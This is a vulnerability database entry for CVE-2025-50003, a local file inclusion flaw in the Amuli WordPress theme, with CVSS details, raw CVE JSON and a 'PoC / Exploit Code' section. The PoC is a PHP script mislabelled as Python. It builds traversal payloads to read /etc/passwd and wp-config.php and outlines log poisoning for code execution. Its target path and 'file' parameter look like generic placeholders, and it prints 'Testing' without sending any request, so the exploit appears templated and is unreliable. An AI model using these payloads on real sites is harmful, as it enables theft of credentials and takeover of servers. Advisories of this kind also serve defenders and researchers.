Security Vulnerability Report
中文
CVE-2025-50003 CVSS 8.1 HIGH

CVE-2025-50003

Published: 2026-01-22 17:15:57
Last Modified: 2026-04-27 16:16:28

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Amuli amuli allows PHP Local File Inclusion.This issue affects Amuli: from n/a through <= 2.3.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Amuli主题 <= 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-50003 PoC - Amuli Theme Local File Inclusion * Affected: Amuli Theme <= 2.3.0 * Type: Local File Inclusion */ $target = 'http://target-site.com/wp-content/themes/amuli/...'; // LFI to read /etc/passwd $lfi_payload = '../../../../../../etc/passwd'; $url_passwd = $target . '?file=' . $lfi_payload; echo "[*] CVE-2025-50003 PoC - Local File Inclusion\n"; echo "[*] Target: $target\n"; echo "[*] Testing LFI with /etc/passwd...\n"; // Read wp-config.php (WordPress configuration) $wp_config_payload = '../../../../../../wp-config.php'; $url_wpconfig = $target . '?file=' . $wp_config_payload; echo "[*] Testing LFI with wp-config.php...\n"; echo "[+] Request URL: $url_wpconfig\n"; // Log poisoning technique for RCE $log_poison_payload = '../../../../../../var/log/apache2/access.log'; echo "[*] Log poisoning attack URL: $target?file=$log_poison_payload\n"; echo "[!] After poisoning logs, include the log file to execute PHP code\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50003", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:56.770", "lastModified": "2026-04-27T16:16:27.580", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Amuli amuli allows PHP Local File Inclusion.This issue affects Amuli: from n/a through <= 2.3.0."}, {"lang": "es", "value": "La vulnerabilidad de Control Inadecuado del Nombre de Fichero para la Sentencia Include/Require en un Programa PHP ('Inclusión Remota de Ficheros PHP') en axiomthemes Amuli amuli permite la Inclusión Local de Ficheros PHP. Este problema afecta a Amuli: desde n/a hasta &lt;= 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/amuli/vulnerability/wordpress-amuli-theme-2-3-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}